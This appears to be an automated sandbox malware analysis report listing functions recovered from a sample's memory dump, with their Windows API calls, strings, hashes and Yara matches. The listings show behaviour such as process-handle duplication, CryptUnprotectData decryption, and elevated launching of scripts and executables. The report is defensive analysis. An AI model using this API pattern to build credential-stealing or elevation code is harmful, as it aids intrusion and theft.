Opcode Fuzzy Hash: c09ff1b7f36846cd2f70e20038cef65db65028f9499b4e4cc306786389cb5efe
Instruction Fuzzy Hash: DA01F426258BC085EA71CB56F89439AA364F7C9B94F804052DE8E43B5ADE38C886CF00

Function 000002093356ED2C Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 000002093356ED4B

Memory Dump Source

Source File: 00000009.00000002.1754255059.00000209334E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000209334E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_209334e0000_sUKFphHSzX.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 8baf8acf487f5caa78a15ef12004ef049afcc069522c3c2ef46e844b516c0117
Instruction ID: 4488fb640e25ecc0449fbb45964816daa63a21cd58eb1fceea49a95ac83671dc
Opcode Fuzzy Hash: 8baf8acf487f5caa78a15ef12004ef049afcc069522c3c2ef46e844b516c0117
Instruction Fuzzy Hash: A9E0683129674181EF202BB4E2C936C72709B807F0F14E365B73E0A3EBDB2484D08E00

Function 00000209335997D0 Relevance: 1.5, APIs: 1, Instructions: 11fileCOMMON

Download Yara Rule

APIs

FindNextFileW.KERNEL32 ref: 00000209335997D4

Memory Dump Source

Source File: 00000009.00000002.1754255059.00000209334E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000209334E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_209334e0000_sUKFphHSzX.jbxd

Yara matches

Similarity

API ID: FileFindNext
String ID:
API String ID: 2029273394-0
Opcode ID: e665cdfc15636110289bb94a971c181b7f8c3c2ee806036c5f8c6bf4a5969788
Instruction ID: 19c8f18ff586609d5904933979f80d5a09dc96aeacdc7f20c6ea12b6f42af249
Opcode Fuzzy Hash: e665cdfc15636110289bb94a971c181b7f8c3c2ee806036c5f8c6bf4a5969788
Instruction Fuzzy Hash: FBC04C15F95A45C1F6591B669CCA24611D8B799710F44C0A4D60E80163DA2CC1D68E62

Function 000002093359B3C4 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

GetNativeSystemInfo.KERNEL32 ref: 000002093359B3CD

Memory Dump Source

Source File: 00000009.00000002.1754255059.00000209334E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000209334E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_209334e0000_sUKFphHSzX.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID:
API String ID: 1721193555-0
Opcode ID: 5d96549d17151685d9874b2efd5e6665c09aeaad6767ec6861ada1b691878f94
Instruction ID: e935c44f936053715d5268d386229c58bf4d3c9fe4d540b11570742be9accecd
Opcode Fuzzy Hash: 5d96549d17151685d9874b2efd5e6665c09aeaad6767ec6861ada1b691878f94
Instruction Fuzzy Hash: 9EB09236A149C0C7C611EB04EC860097371F7D4B0CFD00040E28E42A26CF2CCA2A8E00

Function 00007FF6CFA52B48 Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

HeapAlloc.KERNEL32(?,?,?,00007FF6CFA5C651,?,?,00000000,00007FF6CFA5BF97,?,?,?,00007FF6CFA5A29F,?,?,?,00007FF6CFA5A195), ref: 00007FF6CFA52B86

Memory Dump Source

Source File: 00000009.00000002.1754955296.00007FF6CFA31000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF6CFA30000, based on PE: true

Associated: 00000009.00000002.1754933672.00007FF6CFA30000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755056820.00007FF6CFA68000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755056820.00007FF6CFCA6000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755229476.00007FF6CFCB0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755293595.00007FF6CFCB3000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff6cfa30000_sUKFphHSzX.jbxd

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: 5c270841806ca0d65908707fc072f6ad565d7e89aec5f4c22d169a1f53078808
Instruction ID: 93b80e12c2b8bbff136dfca1ecc8500e3af53e597767c4b9c80ac9806b7fa130
Opcode Fuzzy Hash: 5c270841806ca0d65908707fc072f6ad565d7e89aec5f4c22d169a1f53078808
Instruction Fuzzy Hash: 89F0DA51A49B46C2FA586EE19851675B3954F84B62F194630D9AEC72C1DE6CA4408130

Function 000002093357DEDC Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

HeapAlloc.KERNEL32 ref: 000002093357DF1A

Memory Dump Source

Source File: 00000009.00000002.1754255059.00000209334E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000209334E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_209334e0000_sUKFphHSzX.jbxd

Yara matches

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: ad1b43cdb7c3550550fd4afa13c905d117ea5c1f34bfd66f5f885cc22fb7391c
Instruction ID: d2f7878cb89801f78a0f1d117a5d32dac336ae1a6a8245698a251ddf07c21d99
Opcode Fuzzy Hash: ad1b43cdb7c3550550fd4afa13c905d117ea5c1f34bfd66f5f885cc22fb7391c
Instruction Fuzzy Hash: E7F0A00039134584FE542BB268ED76962D05BC47A0F08D7A07D7F8A2C3DA2CC8C2CF10

Non-executed Functions

Function 00000209335643F0 Relevance: 34.3, APIs: 18, Strings: 1, Instructions: 1015stringmemorynativeCOMMON

Download Yara Rule

APIs

RtlAcquirePebLock.NTDLL ref: 0000020933564433
NtAllocateVirtualMemory.NTDLL ref: 000002093356446B
lstrcpyW.KERNEL32 ref: 00000209335644CD
lstrcatW.KERNEL32 ref: 0000020933564582
NtAllocateVirtualMemory.NTDLL ref: 0000020933564609
lstrcpyW.KERNEL32 ref: 00000209335646BC
RtlInitUnicodeString.NTDLL ref: 00000209335646D1
RtlInitUnicodeString.NTDLL ref: 00000209335646E6
LdrEnumerateLoadedModules.NTDLL ref: 00000209335646F9
RtlReleasePebLock.NTDLL ref: 00000209335646FF

Part of subcall function 0000020933558E10: SHGetKnownFolderPath.SHELL32 ref: 0000020933558E69
Part of subcall function 0000020933558E10: CoTaskMemFree.OLE32 ref: 0000020933558F2A

CoInitializeEx.OLE32 ref: 00000209335647AA
lstrcpyW.KERNEL32 ref: 0000020933564989
lstrcatW.KERNEL32 ref: 0000020933564B8E
CoGetObject.OLE32 ref: 0000020933564BAC
lstrcpyW.KERNEL32 ref: 0000020933565229
lstrcatW.KERNEL32 ref: 000002093356544C
CoGetObject.OLE32 ref: 000002093356546A
CoUninitialize.OLE32 ref: 0000020933565932

Strings

0, xrefs: 000002093356506A

Memory Dump Source

Source File: 00000009.00000002.1754255059.00000209334E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000209334E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_209334e0000_sUKFphHSzX.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$AllocateInitLockMemoryObjectStringUnicodeVirtual$AcquireEnumerateFolderFreeInitializeKnownLoadedModulesPathReleaseTaskUninitialize
String ID: 0
API String ID: 1424456515-4108050209
Opcode ID: 7e9d539707fbfe7c3ef96f7b6fb59187d8ec1b77cdd4079ce7adb8c999373ecf
Instruction ID: 3b5df2aa9184d15d6b6ed7207ca4cc2d18fe67511567750157ad865c2054b5cb
Opcode Fuzzy Hash: 7e9d539707fbfe7c3ef96f7b6fb59187d8ec1b77cdd4079ce7adb8c999373ecf
Instruction Fuzzy Hash: 11C2A836626F848AD7908F69E88169DB3B5F788B88F106219FECD57B19EF38C154C740

Function 0000020933563CF0 Relevance: 23.1, APIs: 10, Strings: 3, Instructions: 351nativelibraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 0000020933563D36
GetProcAddress.KERNEL32 ref: 0000020933563D46
OpenProcess.KERNEL32 ref: 0000020933563D78
NtQuerySystemInformation.NTDLL ref: 0000020933563DA0
NtQuerySystemInformation.NTDLL ref: 0000020933563DCE
GetCurrentProcess.KERNEL32 ref: 0000020933563E93
NtQueryObject.NTDLL ref: 0000020933563ED9
GetFinalPathNameByHandleA.KERNEL32 ref: 0000020933563FCD
CloseHandle.KERNEL32 ref: 00000209335640E8
CloseHandle.KERNEL32 ref: 0000020933564178

Strings

ntdll.dll, xrefs: 0000020933563D2F
NtDuplicateObject, xrefs: 0000020933563D3F
File, xrefs: 0000020933563F0A

Memory Dump Source

Source File: 00000009.00000002.1754255059.00000209334E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000209334E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_209334e0000_sUKFphHSzX.jbxd

Yara matches

Similarity

API ID: Handle$Query$CloseInformationProcessSystem$AddressCurrentFinalModuleNameObjectOpenPathProc
String ID: File$NtDuplicateObject$ntdll.dll
API String ID: 2729825427-3955674919
Opcode ID: b62cb37cd7272f3dc6a9cb59c9a2037bc5f039f77c087b43745b58111f7b66f3
Instruction ID: fec4a6230f8d638da6acdebec9a1ed3ee9c6b9994800cef72327e43e26898384
Opcode Fuzzy Hash: b62cb37cd7272f3dc6a9cb59c9a2037bc5f039f77c087b43745b58111f7b66f3
Instruction Fuzzy Hash: A0E1F4A2B54B8089FB00CBA5D4983AD23B1E795B98F00D151EE5E57B9BDF38C5C9CB40

Function 000002093354F040 Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 218COMMON

Download Yara Rule

APIs

CoInitializeEx.OLE32 ref: 000002093354F09F

Strings

@, xrefs: 000002093354F226

Memory Dump Source

Source File: 00000009.00000002.1754255059.00000209334E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000209334E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_209334e0000_sUKFphHSzX.jbxd

Yara matches

Similarity

API ID: Initialize
String ID: @
API String ID: 2538663250-2766056989
Opcode ID: 218f81a9e7c2f4f1a07a69ee5a536a967b5243667e48d4ae07cbea27cce845f3
Instruction ID: 0cd026fbd3be05599b40bc21e1afdec0b2e93d83f04a3755b0b22caf567c7c78
Opcode Fuzzy Hash: 218f81a9e7c2f4f1a07a69ee5a536a967b5243667e48d4ae07cbea27cce845f3
Instruction Fuzzy Hash: 55A18232B08B408AE714CF75E4887AE77B1F788788F008655EE5E57A96DF38C194C744

Function 00000209335551E0 Relevance: 21.5, APIs: 1, Strings: 11, Instructions: 465COMMON

Download Yara Rule

APIs

ShellExecuteW.SHELL32 ref: 0000020933555767

Strings

.exe, xrefs: 000002093355532D
runas, xrefs: 00000209335556E6
ios_base::eofbit set, xrefs: 000002093355598C
.vbs, xrefs: 00000209335552D2
ios_base::badbit set, xrefs: 000002093355597A
.ps1, xrefs: 0000020933555274
open, xrefs: 00000209335556DD
ios_base::failbit set, xrefs: 0000020933555985
abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+=-&^%$#@!(){}[},.;', xrefs: 0000020933555374
.cmd, xrefs: 00000209335552A3
.exe, xrefs: 0000020933555245

Memory Dump Source

Source File: 00000009.00000002.1754255059.00000209334E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000209334E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_209334e0000_sUKFphHSzX.jbxd

Yara matches

Similarity

API ID: ExecuteShell
String ID: .cmd$.exe$.exe$.ps1$.vbs$abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+=-&^%$#@!(){}[},.;'$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set$open$runas
API String ID: 587946157-4093014531
Opcode ID: 83865aaa30f0f67e5a1970133d5c440eb3c06f3025eabe166e0b5b16e1ad9635
Instruction ID: 75b819c644ca13f006569c1664c83d49ece524ecc95f3f4f452e622d5e80cff7
Opcode Fuzzy Hash: 83865aaa30f0f67e5a1970133d5c440eb3c06f3025eabe166e0b5b16e1ad9635
Instruction Fuzzy Hash: 6822C172A50B8085EB10CF28E8883DD77A1F7847A8F509256FA5E47AABDF74D1C4CB40

Function 0000020933586F14 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 227COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00000209335781FC: GetLastError.KERNEL32 ref: 000002093357820B
Part of subcall function 00000209335781FC: FlsGetValue.KERNEL32 ref: 0000020933578220
Part of subcall function 00000209335781FC: SetLastError.KERNEL32 ref: 00000209335782AB

TranslateName.LIBCMT ref: 0000020933586F7E
TranslateName.LIBCMT ref: 0000020933586FB9
GetACP.KERNEL32 ref: 0000020933587000
IsValidCodePage.KERNEL32 ref: 0000020933587038
GetLocaleInfoW.KERNEL32 ref: 00000209335871F5

Strings

utf8, xrefs: 000002093358711C

Memory Dump Source

Source File: 00000009.00000002.1754255059.00000209334E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000209334E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_209334e0000_sUKFphHSzX.jbxd

Yara matches

Similarity

API ID: ErrorLastNameTranslate$CodeInfoLocalePageValidValue
String ID: utf8
API String ID: 3069159798-905460609
Opcode ID: 4309449c26b629e9b6de698707476955217e9cbe9722d2e68f3c85218e94a805
Instruction ID: f8b16a8abc2fcbd3072b3fe398c6fa8cf16f01c60f115f65b7ee6d1e7a3b7a29
Opcode Fuzzy Hash: 4309449c26b629e9b6de698707476955217e9cbe9722d2e68f3c85218e94a805
Instruction Fuzzy Hash: DA919C3238179485EB649F21D8893A927A4F7C4B80F44C2A5BF5E4BB97DB38C9D1CB41

Function 000002093358795C Relevance: 10.7, APIs: 7, Instructions: 171COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00000209335781FC: GetLastError.KERNEL32 ref: 000002093357820B
Part of subcall function 00000209335781FC: FlsGetValue.KERNEL32 ref: 0000020933578220
Part of subcall function 00000209335781FC: SetLastError.KERNEL32 ref: 00000209335782AB

Part of subcall function 00000209335781FC: FlsSetValue.KERNEL32 ref: 0000020933578241
Part of subcall function 00000209335781FC: FlsGetValue.KERNEL32 ref: 00000209335782E1

GetUserDefaultLCID.KERNEL32 ref: 0000020933587ACC

Part of subcall function 00000209335781FC: FlsSetValue.KERNEL32 ref: 000002093357826E
Part of subcall function 00000209335781FC: FlsSetValue.KERNEL32 ref: 000002093357827F
Part of subcall function 00000209335781FC: FlsSetValue.KERNEL32 ref: 0000020933578290
Part of subcall function 00000209335781FC: FlsSetValue.KERNEL32 ref: 0000020933578300
Part of subcall function 00000209335781FC: FlsSetValue.KERNEL32 ref: 0000020933578328

EnumSystemLocalesW.KERNEL32 ref: 0000020933587AB3
ProcessCodePage.LIBCMT ref: 0000020933587AF6
IsValidCodePage.KERNEL32 ref: 0000020933587B08
IsValidLocale.KERNEL32 ref: 0000020933587B1E
GetLocaleInfoW.KERNEL32 ref: 0000020933587B7A
GetLocaleInfoW.KERNEL32 ref: 0000020933587B96

Memory Dump Source

Source File: 00000009.00000002.1754255059.00000209334E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000209334E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_209334e0000_sUKFphHSzX.jbxd

Yara matches

Similarity

API ID: Value$Locale$CodeErrorInfoLastPageValid$DefaultEnumLocalesProcessSystemUser
String ID:
API String ID: 2591520935-0
Opcode ID: 5eb0d27aa7dc3a9912447742f13a9ce850b1caaedf69b48f01ffc0c9247ee539
Instruction ID: 1e399e6f1f0812b5608e353f2fddcbe5493cfb71861adcdc82a3ba890466ccf6
Opcode Fuzzy Hash: 5eb0d27aa7dc3a9912447742f13a9ce850b1caaedf69b48f01ffc0c9247ee539
Instruction Fuzzy Hash: 99719A227407608AFB109B60D8897EC37A0B784B44F44C6A5BE1F5B797EB39C985CB60

Function 0000020933544710 Relevance: 9.2, APIs: 4, Strings: 1, Instructions: 410COMMON

Download Yara Rule

APIs

__std_exception_destroy.LIBVCRUNTIME ref: 00000209335448C4
__std_exception_destroy.LIBVCRUNTIME ref: 00000209335448D2
__std_exception_destroy.LIBVCRUNTIME ref: 0000020933544B55
__std_exception_destroy.LIBVCRUNTIME ref: 0000020933544B63

Strings

value, xrefs: 00000209335447EA, 0000020933544A83

Memory Dump Source

Source File: 00000009.00000002.1754255059.00000209334E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000209334E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_209334e0000_sUKFphHSzX.jbxd

Yara matches

Similarity

API ID: __std_exception_destroy
String ID: value
API String ID: 2453523683-494360628
Opcode ID: 11e86e21a9d2d88381a9cd1f09b5446d925b0cdc0fb39a6eaff25d2ce025a50c
Instruction ID: 00c292524f98702a2dd576729e5029843337cffb3919fe174c43e99753d0aeba
Opcode Fuzzy Hash: 11e86e21a9d2d88381a9cd1f09b5446d925b0cdc0fb39a6eaff25d2ce025a50c
Instruction Fuzzy Hash: EA029062A98BC085EB04CB74E4883AE6761E7C57A4F509341FA9E47ADBDF78C5C5CB00

Function 00007FF6CFA500B0 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 00007FF6CFA50129
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF6CFA50141
RtlVirtualUnwind.KERNEL32 ref: 00007FF6CFA5017C
IsDebuggerPresent.KERNEL32 ref: 00007FF6CFA501B5
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF6CFA501BF
UnhandledExceptionFilter.KERNEL32 ref: 00007FF6CFA501CA

Memory Dump Source

Source File: 00000009.00000002.1754955296.00007FF6CFA31000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF6CFA30000, based on PE: true

Associated: 00000009.00000002.1754933672.00007FF6CFA30000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755056820.00007FF6CFA68000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755056820.00007FF6CFCA6000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755229476.00007FF6CFCB0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755293595.00007FF6CFCB3000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff6cfa30000_sUKFphHSzX.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: 3ef0962f47fead2417061adc38ad2713cf90374c45b282237d95016c72f16019
Instruction ID: 6fb2ebffbc6043b2a695bda14c74154debe2db00799a9bf9d45a6057fce4e5ff
Opcode Fuzzy Hash: 3ef0962f47fead2417061adc38ad2713cf90374c45b282237d95016c72f16019
Instruction Fuzzy Hash: F2318132618F81C6DB60CF65E8402AEB3A4FB84759F504136EA9D83B99DF3CD145CB10

Function 000002093356F920 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 000002093356F999
RtlLookupFunctionEntry.KERNEL32 ref: 000002093356F9B1
RtlVirtualUnwind.KERNEL32 ref: 000002093356F9EC
IsDebuggerPresent.KERNEL32 ref: 000002093356FA25
SetUnhandledExceptionFilter.KERNEL32 ref: 000002093356FA2F
UnhandledExceptionFilter.KERNEL32 ref: 000002093356FA3A

Memory Dump Source

Source File: 00000009.00000002.1754255059.00000209334E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000209334E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_209334e0000_sUKFphHSzX.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: c7f70f128318b326f672a7b0d6647dc5eb587961ea58d1b4d09a7c2ba848fd84
Instruction ID: c1684990d72453bb960ee4bcec3bd303c88bbb559a8a4ea5b5db62c7bb662479
Opcode Fuzzy Hash: c7f70f128318b326f672a7b0d6647dc5eb587961ea58d1b4d09a7c2ba848fd84
Instruction Fuzzy Hash: BE315332254B8096DB60CF25E88439E73A4F7C8758F508256FA9E83B5BDF38C595CB00

Function 000002093359BB14 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 000002093359BB75
IsDebuggerPresent.KERNEL32 ref: 000002093359BB8D
OutputDebugStringW.KERNEL32 ref: 000002093359BB9E

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 000002093359BB97

Memory Dump Source

Source File: 00000009.00000002.1754255059.00000209334E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000209334E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_209334e0000_sUKFphHSzX.jbxd

Yara matches

Similarity

API ID: DebugDebuggerErrorLastOutputPresentString
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 389471666-631824599
Opcode ID: e8ffe009acab376759065dd43441e42d099b308a5e20a56206d0bc25ee25ae09
Instruction ID: c344db832e7fbdb65b86bf28e7668ccf6b9aefc9f5ce9f5a93d3213e5a103031
Opcode Fuzzy Hash: e8ffe009acab376759065dd43441e42d099b308a5e20a56206d0bc25ee25ae09
Instruction Fuzzy Hash: A5114C32250B40A7F7049B26E6D936932A5FB84345F408165D64E82A97EF38D0E4CB50

Function 0000020933577348 Relevance: 6.1, APIs: 4, Instructions: 83memoryCOMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32 ref: 000002093357739F
GetSystemInfo.KERNEL32 ref: 00000209335773B8
VirtualAlloc.KERNEL32 ref: 0000020933577426
VirtualProtect.KERNEL32 ref: 0000020933577441

Memory Dump Source

Source File: 00000009.00000002.1754255059.00000209334E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000209334E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_209334e0000_sUKFphHSzX.jbxd

Yara matches

Similarity

API ID: Virtual$AllocInfoProtectQuerySystem
String ID:
API String ID: 3562403962-0
Opcode ID: 324fd5cd604fef47d1152131e1f7c01459585a6c12e9a2e3e67a5e0172bc20d3
Instruction ID: 3c0e3e9fe9db409ccfd6e3be6b2c5aebb7da7d86c97ab340796656c3c89299a0
Opcode Fuzzy Hash: 324fd5cd604fef47d1152131e1f7c01459585a6c12e9a2e3e67a5e0172bc20d3
Instruction Fuzzy Hash: 42315E32350B849EDB20CF35D8987D973A5F788788F448125EA4E47B5ADF38D685CB40

Function 0000020933548950 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 376COMMON

Download Yara Rule

APIs

__std_exception_copy.LIBVCRUNTIME ref: 0000020933548BAE

Strings

value, xrefs: 00000209335498D3
parse_error, xrefs: 00000209335489DE

Memory Dump Source

Source File: 00000009.00000002.1754255059.00000209334E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000209334E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_209334e0000_sUKFphHSzX.jbxd

Yara matches

Similarity

API ID: __std_exception_copy
String ID: parse_error$value
API String ID: 592178966-1739288027
Opcode ID: 11e6009c81953df4055eeea6cab8a0ff6ed25ca8da65ab881ed56a98b03e834c
Instruction ID: 2c9cb93ca83bdd03e84e63eeb69845a79b2cad4e1eb47f5dcbd85e6b50505b28
Opcode Fuzzy Hash: 11e6009c81953df4055eeea6cab8a0ff6ed25ca8da65ab881ed56a98b03e834c
Instruction Fuzzy Hash: 00F1E362B94B8099EB00DF74E8893DD2362F7D5398F909242FA4E56A9BDF74C5C4CB40

Function 0000020933599480 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41windowCOMMON

Download Yara Rule

APIs

GetLocaleInfoEx.KERNEL32 ref: 00000209335994A6
FormatMessageA.KERNEL32 ref: 00000209335994D9

Strings

!x-sys-default-locale, xrefs: 0000020933599499

Memory Dump Source

Source File: 00000009.00000002.1754255059.00000209334E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000209334E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_209334e0000_sUKFphHSzX.jbxd

Yara matches

Similarity

API ID: FormatInfoLocaleMessage
String ID: !x-sys-default-locale
API String ID: 4235545615-2729719199
Opcode ID: f19c835850623712fbca22d426e0c2013945c380ca8add72a55f3f09a2f97b50
Instruction ID: 1eedd95de47592da37d688d2bb694b0555fd2d6a2598726a7d616096e9acc600
Opcode Fuzzy Hash: f19c835850623712fbca22d426e0c2013945c380ca8add72a55f3f09a2f97b50
Instruction Fuzzy Hash: E7019272754B8082F7218B12F498B9A67A6F3C4784F44C065EA4E47B97CB3CC584CB40

Function 000002093357C1A8 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32 ref: 000002093357C21C

Strings

GetLocaleInfoEx, xrefs: 000002093357C1C4, 000002093357C1D5

Memory Dump Source

Source File: 00000009.00000002.1754255059.00000209334E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000209334E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_209334e0000_sUKFphHSzX.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID: GetLocaleInfoEx
API String ID: 2299586839-2904428671
Opcode ID: 0fc81d44bec917c2802c26d4724ac6a513cb7d03bb6cf24fcfbb40603345bdc0
Instruction ID: bce4c8aa8e540086eec12b95a3bb99bd8566d65f1037543921bb51eaccef14c9
Opcode Fuzzy Hash: 0fc81d44bec917c2802c26d4724ac6a513cb7d03bb6cf24fcfbb40603345bdc0
Instruction Fuzzy Hash: 1601672174074086EB149B56B48869AA7A0E7C5BD0F54C466FE4F17B67CE38C5C18B40

Function 0000020933515EE0 Relevance: 3.1, APIs: 2, Instructions: 145encryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32 ref: 0000020933515F6D
LocalFree.KERNEL32 ref: 0000020933515FFF

Memory Dump Source

Source File: 00000009.00000002.1754255059.00000209334E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000209334E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_209334e0000_sUKFphHSzX.jbxd

Yara matches

Similarity

API ID: CryptDataFreeLocalUnprotect
String ID:
API String ID: 1561624719-0
Opcode ID: 9aab8af0a6dc666105387b0e81acab4c5ee9bd6f4df5b63915f30973d6d4e367
Instruction ID: c613882f240ac906bd6a871bb3a8788ccab3441adecb80c32b5fdb024191fe8b
Opcode Fuzzy Hash: 9aab8af0a6dc666105387b0e81acab4c5ee9bd6f4df5b63915f30973d6d4e367
Instruction Fuzzy Hash: 0D616972B54B809AFB10DF74E48839D73A1E79878CF048265FA8E56A8BDB78C594C740

Function 00000209335521C0 Relevance: 3.1, APIs: 2, Instructions: 86encryptionCOMMON

Download Yara Rule

APIs

CryptProtectData.CRYPT32 ref: 0000020933552218
LocalFree.KERNEL32 ref: 00000209335522AA

Memory Dump Source

Source File: 00000009.00000002.1754255059.00000209334E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000209334E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_209334e0000_sUKFphHSzX.jbxd

Yara matches

Similarity

API ID: CryptDataFreeLocalProtect
String ID:
API String ID: 2714945720-0
Opcode ID: 6da8b2380d1e6afdbe15ad09ed0a82a6e20629f9e1f2d0947d1afcdde56a6e99
Instruction ID: f65c3af63f70d28231f03a54c20a15d1be9f90920b424cdcb918c18d0dc76c57
Opcode Fuzzy Hash: 6da8b2380d1e6afdbe15ad09ed0a82a6e20629f9e1f2d0947d1afcdde56a6e99
Instruction Fuzzy Hash: 85414933654B80CAF3208F74E4843DD37A4F79878CF448269BA8E46E8ADB79D5A4C744

Function 0000020933587270 Relevance: 1.6, APIs: 1, Instructions: 61COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00000209335781FC: GetLastError.KERNEL32 ref: 000002093357820B
Part of subcall function 00000209335781FC: FlsGetValue.KERNEL32 ref: 0000020933578220
Part of subcall function 00000209335781FC: SetLastError.KERNEL32 ref: 00000209335782AB

EnumSystemLocalesW.KERNEL32 ref: 000002093358730E

Memory Dump Source

Source File: 00000009.00000002.1754255059.00000209334E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000209334E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_209334e0000_sUKFphHSzX.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystemValue
String ID:
API String ID: 3029459697-0
Opcode ID: 58800bb6c4d0d9c609f2f6f306793987a7a581936cd52f064e9451565f60872b
Instruction ID: 293301b02981aae268815e543710433c6e4ba059cab8c7d289a34e8f7f3460bd
Opcode Fuzzy Hash: 58800bb6c4d0d9c609f2f6f306793987a7a581936cd52f064e9451565f60872b
Instruction Fuzzy Hash: B711D263B447548AEB248F2AD0C47A87BA0F390BA0F448215F66B473D6CB24CAD1CB40

